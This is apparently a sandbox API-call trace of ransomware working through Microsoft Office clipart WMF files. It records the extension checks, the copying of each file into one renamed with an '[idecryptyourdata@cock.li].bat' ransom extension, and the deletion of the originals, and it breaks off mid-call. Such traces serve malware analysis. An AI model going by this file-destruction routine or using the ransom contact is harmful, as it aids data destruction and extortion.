[0069.139] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0069.139] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0089945.WMF") returned 68 [0069.139] lstrlenW (lpString=".zip") returned 4 [0069.139] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0069.139] lstrlenW (lpString=".rar") returned 4 [0069.139] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0069.139] lstrlenW (lpString=".bz2") returned 4 [0069.139] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0069.139] lstrlenW (lpString=".7z") returned 3 [0069.139] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0069.139] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0089945.WMF") returned 68 [0069.139] lstrlenW (lpString=".dbf") returned 4 [0069.139] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0069.139] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0089945.WMF") returned 68 [0069.139] lstrlenW (lpString=".1cd") returned 4 [0069.139] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0069.139] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0089945.WMF") returned 68 [0069.139] lstrlenW (lpString=".jpg") returned 4 [0069.139] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0069.139] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0069.140] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0069.140] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0090149.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0090149.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a0 [0069.140] GetLastError () returned 0x0 [0069.140] ReadFile (in: hFile=0x388, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x6e34, lpOverlapped=0x0) returned 1 [0069.142] WriteFile (in: hFile=0x3a0, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0x6e40, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0x6e40, lpOverlapped=0x0) returned 1 [0069.143] ReadFile (in: hFile=0x388, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x0, lpOverlapped=0x0) returned 1 [0069.143] WriteFile (in: hFile=0x3a0, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0xec, lpOverlapped=0x0) returned 1 [0069.143] SetEndOfFile (hFile=0x3a0) returned 1 [0069.143] CloseHandle (hObject=0x3a0) returned 1 [0069.143] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0069.143] SetEndOfFile (hFile=0x388) returned 1 [0069.144] CloseHandle (hObject=0x388) returned 1 [0069.144] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0090149.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0069.144] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0090149.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0090149.wmf")) returned 1 [0069.145] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0090149.WMF") returned 68 [0069.145] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0090149.WMF") returned 68 [0069.145] lstrlenW (lpString=".doc") returned 4 [0069.145] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0069.145] lstrlenW (lpString=".docx") returned 5 [0069.145] lstrcmpiW (lpString1=".docx", lpString2="9.WMF") returned -1 [0069.145] lstrlenW (lpString=".pdf") returned 4 [0069.145] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0069.145] lstrlenW (lpString=".xls") returned 4 [0069.145] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0069.145] lstrlenW (lpString=".xlsx") returned 5 [0069.145] lstrcmpiW (lpString1=".xlsx", lpString2="9.WMF") returned -1 [0069.145] lstrlenW (lpString=".ppt") returned 4 [0069.145] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0069.145] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0090149.WMF") returned 68 [0069.145] lstrlenW (lpString=".zip") returned 4 [0069.145] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0069.145] lstrlenW (lpString=".rar") returned 4 [0069.145] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0069.145] lstrlenW (lpString=".bz2") returned 4 [0069.145] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0069.145] lstrlenW (lpString=".7z") returned 3 [0069.145] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0069.145] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0090149.WMF") returned 68 [0069.145] lstrlenW (lpString=".dbf") returned 4 [0069.145] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0069.145] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0090149.WMF") returned 68 [0069.145] lstrlenW (lpString=".1cd") returned 4 [0069.145] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0069.145] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0090149.WMF") returned 68 [0069.145] lstrlenW (lpString=".jpg") returned 4 [0069.145] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0069.146] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0069.146] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0069.146] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0090390.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0090390.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a0 [0069.146] GetLastError () returned 0x0 [0069.146] ReadFile (in: hFile=0x388, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x44e6, lpOverlapped=0x0) returned 1 [0069.148] WriteFile (in: hFile=0x3a0, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0x44f0, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0x44f0, lpOverlapped=0x0) returned 1 [0069.149] ReadFile (in: hFile=0x388, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x0, lpOverlapped=0x0) returned 1 [0069.149] WriteFile (in: hFile=0x3a0, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0xec, lpOverlapped=0x0) returned 1 [0069.149] SetEndOfFile (hFile=0x3a0) returned 1 [0069.149] CloseHandle (hObject=0x3a0) returned 1 [0069.149] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0069.149] SetEndOfFile (hFile=0x388) returned 1 [0069.150] CloseHandle (hObject=0x388) returned 1 [0069.150] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0090390.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0069.150] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0090390.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0090390.wmf")) returned 1 [0069.150] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0090390.WMF") returned 68 [0069.150] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0090390.WMF") returned 68 [0069.150] lstrlenW (lpString=".doc") returned 4 [0069.150] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0069.150] lstrlenW (lpString=".docx") returned 5 [0069.150] lstrcmpiW (lpString1=".docx", lpString2="0.WMF") returned -1 [0069.151] lstrlenW (lpString=".pdf") returned 4 [0069.151] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0069.151] lstrlenW (lpString=".xls") returned 4 [0069.151] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0069.151] lstrlenW (lpString=".xlsx") returned 5 [0069.151] lstrcmpiW (lpString1=".xlsx", lpString2="0.WMF") returned -1 [0069.151] lstrlenW (lpString=".ppt") returned 4 [0069.151] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0069.151] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0090390.WMF") returned 68 [0069.151] lstrlenW (lpString=".zip") returned 4 [0069.151] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0069.151] lstrlenW (lpString=".rar") returned 4 [0069.151] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0069.151] lstrlenW (lpString=".bz2") returned 4 [0069.151] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0069.151] lstrlenW (lpString=".7z") returned 3 [0069.151] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0069.151] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0090390.WMF") returned 68 [0069.151] lstrlenW (lpString=".dbf") returned 4 [0069.151] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0069.151] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0090390.WMF") returned 68 [0069.151] lstrlenW (lpString=".1cd") returned 4 [0069.151] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0069.151] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0090390.WMF") returned 68 [0069.151] lstrlenW (lpString=".jpg") returned 4 [0069.151] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0069.152] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0069.152] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0069.152] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0090777.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0090777.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a0 [0069.152] GetLastError () returned 0x0 [0069.152] ReadFile (in: hFile=0x388, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0xd04, lpOverlapped=0x0) returned 1 [0069.168] WriteFile (in: hFile=0x3a0, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0xd10, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0xd10, lpOverlapped=0x0) returned 1 [0069.170] ReadFile (in: hFile=0x388, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x0, lpOverlapped=0x0) returned 1 [0069.170] WriteFile (in: hFile=0x3a0, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0xec, lpOverlapped=0x0) returned 1 [0069.170] SetEndOfFile (hFile=0x3a0) returned 1 [0069.170] CloseHandle (hObject=0x3a0) returned 1 [0069.171] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0069.171] SetEndOfFile (hFile=0x388) returned 1 [0069.172] CloseHandle (hObject=0x388) returned 1 [0069.172] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0090777.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0069.172] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0090777.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0090777.wmf")) returned 1 [0069.172] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0090777.WMF") returned 68 [0069.173] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0090777.WMF") returned 68 [0069.173] lstrlenW (lpString=".doc") returned 4 [0069.173] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0069.173] lstrlenW (lpString=".docx") returned 5 [0069.173] lstrcmpiW (lpString1=".docx", lpString2="7.WMF") returned -1 [0069.173] lstrlenW (lpString=".pdf") returned 4 [0069.173] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0069.173] lstrlenW (lpString=".xls") returned 4 [0069.173] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0069.173] lstrlenW (lpString=".xlsx") returned 5 [0069.173] lstrcmpiW (lpString1=".xlsx", lpString2="7.WMF") returned -1 [0069.173] lstrlenW (lpString=".ppt") returned 4 [0069.173] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0069.173] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0090777.WMF") returned 68 [0069.173] lstrlenW (lpString=".zip") returned 4 [0069.173] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0069.173] lstrlenW (lpString=".rar") returned 4 [0069.173] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0069.173] lstrlenW (lpString=".bz2") returned 4 [0069.173] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0069.173] lstrlenW (lpString=".7z") returned 3 [0069.173] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0069.173] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0090777.WMF") returned 68 [0069.173] lstrlenW (lpString=".dbf") returned 4 [0069.173] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0069.173] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0090777.WMF") returned 68 [0069.173] lstrlenW (lpString=".1cd") returned 4 [0069.173] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0069.173] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0090777.WMF") returned 68 [0069.173] lstrlenW (lpString=".jpg") returned 4 [0069.173] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0069.174] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0069.174] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0069.174] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0090781.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0090781.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a0 [0069.174] GetLastError () returned 0x0 [0069.174] ReadFile (in: hFile=0x388, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x14c2, lpOverlapped=0x0) returned 1 [0069.175] WriteFile (in: hFile=0x3a0, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0x14d0, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0x14d0, lpOverlapped=0x0) returned 1 [0069.176] ReadFile (in: hFile=0x388, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x0, lpOverlapped=0x0) returned 1 [0069.176] WriteFile (in: hFile=0x3a0, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0xec, lpOverlapped=0x0) returned 1 [0069.176] SetEndOfFile (hFile=0x3a0) returned 1 [0069.177] CloseHandle (hObject=0x3a0) returned 1 [0069.177] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0069.177] SetEndOfFile (hFile=0x388) returned 1 [0069.177] CloseHandle (hObject=0x388) returned 1 [0069.177] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0090781.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0069.178] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0090781.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0090781.wmf")) returned 1 [0069.178] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0090781.WMF") returned 68 [0069.178] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0090781.WMF") returned 68 [0069.178] lstrlenW (lpString=".doc") returned 4 [0069.178] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0069.178] lstrlenW (lpString=".docx") returned 5 [0069.178] lstrcmpiW (lpString1=".docx", lpString2="1.WMF") returned -1 [0069.178] lstrlenW (lpString=".pdf") returned 4 [0069.178] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0069.178] lstrlenW (lpString=".xls") returned 4 [0069.178] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0069.178] lstrlenW (lpString=".xlsx") returned 5 [0069.178] lstrcmpiW (lpString1=".xlsx", lpString2="1.WMF") returned -1 [0069.178] lstrlenW (lpString=".ppt") returned 4 [0069.178] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0069.178] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0090781.WMF") returned 68 [0069.178] lstrlenW (lpString=".zip") returned 4 [0069.179] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0069.179] lstrlenW (lpString=".rar") returned 4 [0069.179] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0069.179] lstrlenW (lpString=".bz2") returned 4 [0069.179] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0069.179] lstrlenW (lpString=".7z") returned 3 [0069.179] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0069.179] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0090781.WMF") returned 68 [0069.179] lstrlenW (lpString=".dbf") returned 4 [0069.179] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0069.179] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0090781.WMF") returned 68 [0069.179] lstrlenW (lpString=".1cd") returned 4 [0069.179] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0069.179] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0090781.WMF") returned 68 [0069.179] lstrlenW (lpString=".jpg") returned 4 [0069.179] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0069.179] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0069.179] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0069.179] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0090783.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0090783.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a0 [0069.180] GetLastError () returned 0x0 [0069.180] ReadFile (in: hFile=0x388, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x1b16, lpOverlapped=0x0) returned 1 [0069.181] WriteFile (in: hFile=0x3a0, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0x1b20, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0x1b20, lpOverlapped=0x0) returned 1 [0069.182] ReadFile (in: hFile=0x388, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x0, lpOverlapped=0x0) returned 1 [0069.182] WriteFile (in: hFile=0x3a0, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0xec, lpOverlapped=0x0) returned 1 [0069.182] SetEndOfFile (hFile=0x3a0) returned 1 [0069.183] CloseHandle (hObject=0x3a0) returned 1 [0069.183] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0069.183] SetEndOfFile (hFile=0x388) returned 1 [0069.183] CloseHandle (hObject=0x388) returned 1 [0069.183] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0090783.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0069.184] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0090783.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0090783.wmf")) returned 1 [0069.184] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0090783.WMF") returned 68 [0069.184] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0090783.WMF") returned 68 [0069.184] lstrlenW (lpString=".doc") returned 4 [0069.184] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0069.184] lstrlenW (lpString=".docx") returned 5 [0069.184] lstrcmpiW (lpString1=".docx", lpString2="3.WMF") returned -1 [0069.184] lstrlenW (lpString=".pdf") returned 4 [0069.184] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0069.184] lstrlenW (lpString=".xls") returned 4 [0069.184] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0069.184] lstrlenW (lpString=".xlsx") returned 5 [0069.184] lstrcmpiW (lpString1=".xlsx", lpString2="3.WMF") returned -1 [0069.184] lstrlenW (lpString=".ppt") returned 4 [0069.184] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0069.184] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0090783.WMF") returned 68 [0069.184] lstrlenW (lpString=".zip") returned 4 [0069.184] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0069.184] lstrlenW (lpString=".rar") returned 4 [0069.184] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0069.184] lstrlenW (lpString=".bz2") returned 4 [0069.184] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0069.185] lstrlenW (lpString=".7z") returned 3 [0069.185] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0069.185] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0090783.WMF") returned 68 [0069.185] lstrlenW (lpString=".dbf") returned 4 [0069.185] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0069.688] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0090783.WMF") returned 68 [0069.688] lstrlenW (lpString=".1cd") returned 4 [0069.688] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0069.688] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0090783.WMF") returned 68 [0069.688] lstrlenW (lpString=".jpg") returned 4 [0069.688] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0069.688] SetFilePointerEx (in: hFile=0x36c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0069.689] SetFilePointerEx (in: hFile=0x36c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0069.689] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099163.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099163.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x308 [0069.689] GetLastError () returned 0x0 [0069.689] ReadFile (in: 